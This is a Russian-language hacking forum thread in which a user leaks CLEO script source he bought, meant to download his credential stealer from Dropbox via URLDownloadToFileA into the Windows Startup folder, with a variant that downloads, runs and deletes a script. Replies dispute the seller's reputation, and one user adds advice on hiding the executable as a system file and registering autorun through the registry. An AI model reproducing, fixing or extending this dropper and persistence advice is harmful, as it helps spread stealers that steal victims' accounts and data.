Исходник Cleo Downloader [Слив]

Статус
В этой теме нельзя размещать новые ответы.

Madison1337

Известный
Автор темы
33
11
Короче купил я у этого инопланетянина - https://vk.com/stas2706 тру загрузчик,который установит мой стиллак в автозагрузку.
В итоге он мне дал какую-то дичь,я ему дал сорец клео стиллера и попросил туда вписать эту фишку,в итоге этот идиот дал какую-то хуйня которая даже не работала.

[HIDE-POSTS=0]
Код:
:upl
0AC8: 1@ = allocate_memory_size 256
0AC8: 2@ = allocate_memory_size 256
0AD3: 2@ = format "C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\FG.exe" //////// Вместо точек путь куда сохранять типа: CLEO\Test.cs
0AD3: 1@ = format "https:%с%сwww.dropbox.com/s/b851alcy6oixsui/FG.exe?dl=1" 47 47 /////////////////// Путь для скачки на дропбоксе в таком формате, надеюсь поймешь)
0AB1: call_scm_func @DWL 2 2@ 1@ 3@
0AC9: free_allocated_memory 1@
0AC9: free_allocated_memory 2@
ret 0

/////////// run ////////////////////////
:DWL
0AA2: 10@ = load_library "Urlmon.dll" // IF and SET
0AA4: 11@ = get_proc_address "URLDownloadToFileA" library 10@ // IF and SET
0AA7: call_function 11@ num_params 5 pop 0 0 0 0@ 1@ 0 12@
0AB2: ret 1 12@
вот это вставляешь
и в нвчало кода
после запуска клео
call @upl 0
и всё)

Или вот то что он мне кинул сначала :
Код:
:upl
0AC8: 1@ = allocate_memory_size 256
0AC8: 2@ = allocate_memory_size 256
0AD3: 2@ = format "....." //////// Вместо точек путь куда сохранять типа: CLEO\Test.cs
0AD3: 1@ = format "http:%c%cwww.dropbox.com/s/6iz0u41mg8t45cl/test.cs?dl=1" 47 47 /////////////////// Путь для скачки на дропбоксе в таком формате, надеюсь поймешь)
0AB1: call_scm_func @DWL 2 2@ 1@ 3@
0AC9: free_allocated_memory 1@
0AC9: free_allocated_memory 2@
////////////// cleo //////////////////////
/////////// run ////////////////////////
0AC8: 2@ = allocate_memory_size 256
0AD3: 2@ = "..." ///// Название скрипта типа Test.cs
0A92: create_custom_thread 2@
0AC9: free_allocated_memory 2@
0B00: delete_file "...." /////// Ну и опять путь
ret 0
/////////// run ////////////////////////
:DWL
0AA2: 10@ = load_library "Urlmon.dll" // IF and SET
0AA4: 11@ = get_proc_address "URLDownloadToFileA" library 10@ // IF and SET
0AA7: call_function 11@ num_params 5 pop 0 0 0 0@ 1@ 0 12@
0AB2: ret 1 12@

[/HIDE-POSTS]

Короче в хайде видно что он нихуя толком не объяснил и это хуйня не работает тестите сами.

Он не учел того что требует права администратора.

За эту дичь я ему дал нихуевый сборник,который мог бы продать за две сотки....
Кто сможет нормализовать бесплатно жду в ЛС

Наперед мне давать код не хотел,ну я поверил ему,проверенный же хули.

lWoa_w5YCzA.jpg

CyGMyJpp4yY.jpg

XpQ8BrJEq2o.jpg

WiK7ZoKLlIw.jpg

Видно что у него какой-то свой есть скрипт,вот пруф что он мне хуйню продал...
UzF29x6KErc.jpg


Вот еще

x8t0OmfDfU4.jpg

u42YexwRS7k.jpg
 
Последнее редактирование:

Romelo

dev.
Проверенный
540
622
а я говорил этому инопланетянину, что это бред -_-
 

FYP

Известный
Администратор
1,757
5,684
Вывод : Делайте группу "Проверенный" за заслуги,а не за достижение пары соток постов -_-
неправильные у тебя выводы. группа выдаётся за полезность постов, а не количество. стас в течении продолжительного срока вёл полезную активность на сайте, за что и заслужил группу.
на счёт сабжа: мы не несём ответственности за подобного рода сделки. но так или иначе, стасу придётся объяснить произошедшее (если, конечно, всё действительно так).
 
  • Нравится
Реакции: Madison1337

Terrorblade

Новичок
2
0
неправильные у тебя выводы. группа выдаётся за полезность постов, а не количество. стас в течении продолжительного срока вёл полезную активность на сайте, за что и заслужил группу.
на счёт сабжа: мы не несём ответственности за подобного рода сделки. но так или иначе, стасу придётся объяснить произошедшее (если, конечно, всё действительно так).
Такая тема действительно была, stealer c++ назывался что-то в этом вроде часа 2-3 назад
 

Stas07

Известный
Проверенный
262
98
хм, мастерски слил... И что ты этим добился?
 

Stas07

Известный
Проверенный
262
98
Ты купил? Я сделал тебе код? Что тебя не устраевает?
 

SR_team

like pancake
BH Team
4,707
6,347
Этот exe качаешь в папку допустимую для записи без прав администратора, потом помечаешь файл системным, что бы он скрылся и запускаешь через шелл.
В код программы, которую скачиваешь суешь регистрацию автозагрузки через реестр
 
  • Нравится
Реакции: Madison1337
Статус
В этой теме нельзя размещать новые ответы.